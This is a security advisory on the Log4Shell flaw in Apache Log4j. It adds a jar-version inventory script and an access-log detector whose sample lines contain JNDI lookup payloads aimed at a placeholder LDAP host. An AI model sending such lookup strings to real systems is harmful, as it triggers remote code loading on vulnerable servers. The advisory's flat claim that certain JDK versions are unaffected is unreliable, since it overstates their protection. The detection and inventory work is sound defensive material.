Log4Shell – CVE-2021-44228 – Apache Log4j Vulnerability

Priority: Critical

Executive Summary:

Tracked as CVE-2021-44228, a new remote code execution vulnerability in Apache Log4j2, a Java-based logging library, enables threat actors to take full control of servers without authentication. Publicly disclosed on 9th December 2021, the vulnerability is believed to be actively exploited in the wild.

The flaw was dubbed “Log4Shell” by LunaSec, who informed the public. Versions 2.0 through 2.14.1 of Apache Log4j are affected. Java Development Kit versions 6u211, 7u201, 8u191 and 11.0.1 are not affected; see the LunaSec blog post in Source [1].

Detect:

The flaw was first discovered, 48 hours ago, on sites that cater to players of the popular game Minecraft. Those sites reportedly warned that attackers could run malicious code on either servers or clients running the Java version of Minecraft by manipulating logged messages, including text typed into chat messages.

Threat actors globally have already tried to exploit the new bug, according to a tweet from the Cyber Emergency Response Team (CERT) of the Deutsche Telekom Group, who added that they were seeing attacks on their honeypots coming from the Tor network.

Affected Products:

The vulnerability affects versions of Log4j up to and including 2.14.1. Specifically, versions 2.0 through 2.14.1 of Apache Log4j are affected.

Java Development Kit versions 6u211, 7u201, 8u191 and 11.0.1 are not affected.

Prevent:

Updating log4j-core.jar to version 2.15.0, which was released on Friday, fixes the problem. Specifically, to prevent the library from being exploited, it is urgently recommended that Log4j be upgraded to log4j-2.15.0-rc1.
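
The upgrade advice above only helps once you know where log4j-core actually lives on a host. The inventory script below is an added example written for this brief; it is not part of the original advisory or of the Log4j project. It walks a directory tree, finds log4j-core jars, reads the version from the jar manifest (falling back to the filename), and flags anything in the 2.0 through 2.14.1 range named above, or of unknown version, as needing the 2.15.0 upgrade. The fixture directory and the jars it creates are constructed for demonstration and contain only a manifest.

```python
import os
import re
import tempfile
import zipfile
from typing import List, Optional, Tuple

# Boundaries taken from the advisory: 2.0 through 2.14.1 affected, 2.15.0 fixes it.
FIRST_AFFECTED = (2, 0, 0)
FIXED_VERSION = (2, 15, 0)

# Filename fallback, e.g. log4j-core-2.14.1.jar or log4j-core-2.15.0-rc1.jar
JAR_NAME_RE = re.compile(r"^log4j-core-(?P<ver>\d+(?:\.\d+)*)(?:[-.][A-Za-z0-9.-]+)?\.jar$")


def parse_version(text: str) -> Optional[Tuple[int, int, int]]:
    """Turn '2.14.1' or '2.15.0-rc1' into a comparable tuple; qualifiers are ignored."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", text)
    if m is None:
        return None
    return (int(m.group(1)), int(m.group(2)), int(m.group(3) or 0))


def manifest_version(jar_path: str) -> Optional[str]:
    """Read Implementation-Version from the jar's manifest, if present."""
    try:
        with zipfile.ZipFile(jar_path) as zf:
            manifest = zf.read("META-INF/MANIFEST.MF").decode("utf-8", "replace")
    except (zipfile.BadZipFile, KeyError, OSError):
        return None
    for line in manifest.splitlines():
        if line.startswith("Implementation-Version:"):
            return line.split(":", 1)[1].strip()
    return None


def is_affected(version: Tuple[int, int, int]) -> bool:
    """True for 2.0 <= version < 2.15.0, the range the advisory calls affected."""
    return FIRST_AFFECTED <= version < FIXED_VERSION


def scan(root: str) -> List[Tuple[str, str, bool]]:
    """Walk root and return (path, version, needs_action) for every log4j-core jar.
    Jars whose version cannot be determined are flagged so they are not skipped."""
    findings = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if not (name.startswith("log4j-core") and name.endswith(".jar")):
                continue
            path = os.path.join(dirpath, name)
            ver_text = manifest_version(path)
            if ver_text is None:
                m = JAR_NAME_RE.match(name)
                ver_text = m.group("ver") if m else None
            parsed = parse_version(ver_text) if ver_text else None
            needs_action = parsed is None or is_affected(parsed)
            findings.append((path, ver_text or "unknown", needs_action))
    return sorted(findings)


def build_fixture() -> str:
    """Create a throwaway tree of constructed jars (each holds only a manifest)."""
    root = tempfile.mkdtemp(prefix="log4j-scan-")
    samples = {
        "app1/lib/log4j-core-2.14.1.jar": "2.14.1",
        "app2/WEB-INF/lib/log4j-core-2.15.0.jar": "2.15.0",
        "app3/lib/log4j-core-2.13.3.jar": None,  # no version in manifest -> use filename
    }
    for rel, ver in samples.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        lines = ["Manifest-Version: 1.0"]
        if ver is not None:
            lines.append(f"Implementation-Version: {ver}")
        with zipfile.ZipFile(path, "w") as zf:
            zf.writestr("META-INF/MANIFEST.MF", "\r\n".join(lines) + "\r\n")
    return root


if __name__ == "__main__":
    fixture = build_fixture()
    for path, version, needs_action in scan(fixture):
        state = "UPGRADE to 2.15.0" if needs_action else "ok"
        print(f"{version:>8}  {state:<18} {path}")
```

Point scan() at the real application roots instead of the fixture to use it on a host. Reading the manifest before trusting the filename matters because repackaged or renamed jars are common in deployed applications, and treating an unreadable version as actionable keeps a broken jar from quietly passing the check.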

React:

Security researchers consider Log4Shell to be much like Shellshock with regard to the enormous attack surface it presents. John Hammond, Senior Security Researcher at Huntress, who created a PoC for Log4Shell, predicted that threat actors will likely include payloads in simple HTTP connections, either in a User-Agent header or in trivial POST form data.

John Hammond informed Threatpost that “organisations are already seeing signs of exploitation in the wild, and adversaries will just spray-and-pray across the internet.” “This isn’t a targeted attack”, he noted, given that “there is no target.”

The Apache Foundation published a patch for the critical-rated vulnerability yesterday. Its patch notes confirmed: “An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.”
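
The Detect section describes log messages carrying attacker-supplied text, and the React section names the User-Agent header and POST form data as the likely carriers. As an added illustration that is not part of the original advisory, the Python below scans web access-log lines for the Log4j lookup prefix in exactly those fields. The log lines, the combined-format-plus-body layout and the IP addresses are constructed assumptions; the detector matches only the literal prefix, so treat its hits as a triage starting point rather than a complete rule.

```python
import re
from typing import Dict, List

# Constructed sample access-log lines in Apache "combined" format with one extra
# quoted field holding the POST body (assumption: the web tier logs bodies this way).
# None of these are real requests; the third uses an upper-case lookup prefix to show
# that matching must be case-insensitive, and the fourth contains "jndi" harmlessly.
SAMPLE_LOG_LINES = [
    '203.0.113.5 - - [10/Dec/2021:14:02:11 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"Mozilla/5.0 (X11; Linux x86_64)" "-"',
    '203.0.113.7 - - [10/Dec/2021:14:02:12 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://lookup.example/a}" "-"',
    '203.0.113.9 - - [10/Dec/2021:14:02:13 +0000] "POST /login HTTP/1.1" 302 0 "-" '
    '"curl/7.79.1" "user=${JNDI:ldap://lookup.example/b}&pw=x"',
    '198.51.100.2 - - [10/Dec/2021:14:02:14 +0000] "GET /search?q=jndi HTTP/1.1" 200 88 "-" '
    '"Mozilla/5.0" "-"',
]

# Fields of the combined format, plus the trailing body field.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d+) \S+ '
    r'"(?P<ref>[^"]*)" "(?P<ua>[^"]*)" "(?P<body>[^"]*)"$'
)

# The Log4j lookup prefix that triggers JNDI resolution when message lookup
# substitution is enabled. Case-insensitive and whitespace-tolerant, but literal.
JNDI_LOOKUP_RE = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)

# Request fields a remote client controls and that commonly end up in a logger.
SCANNED_FIELDS = ("req", "ref", "ua", "body")


def find_jndi_lookups(lines: List[str]) -> List[Dict[str, str]]:
    """Return one finding per (line, field) that carries a JNDI lookup string."""
    findings = []
    for number, line in enumerate(lines, start=1):
        match = LOG_RE.match(line)
        if match is None:
            continue  # unparseable line; a real pipeline would count and review these
        for field in SCANNED_FIELDS:
            value = match.group(field)
            if JNDI_LOOKUP_RE.search(value):
                findings.append({
                    "line": str(number),
                    "ip": match.group("ip"),
                    "field": field,
                    "value": value,
                })
    return findings


if __name__ == "__main__":
    for hit in find_jndi_lookups(SAMPLE_LOG_LINES):
        print(f"line {hit['line']}: {hit['ip']} sent a lookup in {hit['field']}: {hit['value']}")
```

Run it against a real access log by passing the file's lines to find_jndi_lookups(); each finding carries the source IP and the field the string arrived in, which is what an incident responder needs first when deciding which hosts to check for a successful lookup.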

Sources

[1]: https://www.lunasec.io/docs/blog/log4j-zero-day/
[2]: https://threatpost.com/zero-day-in-ubiquitous-apache-log4j-tool-under-active-attack/176937/
[3]: https://www.theregister.com/2021/12/10/log4j_remote_code_execution_vuln_patch_issued/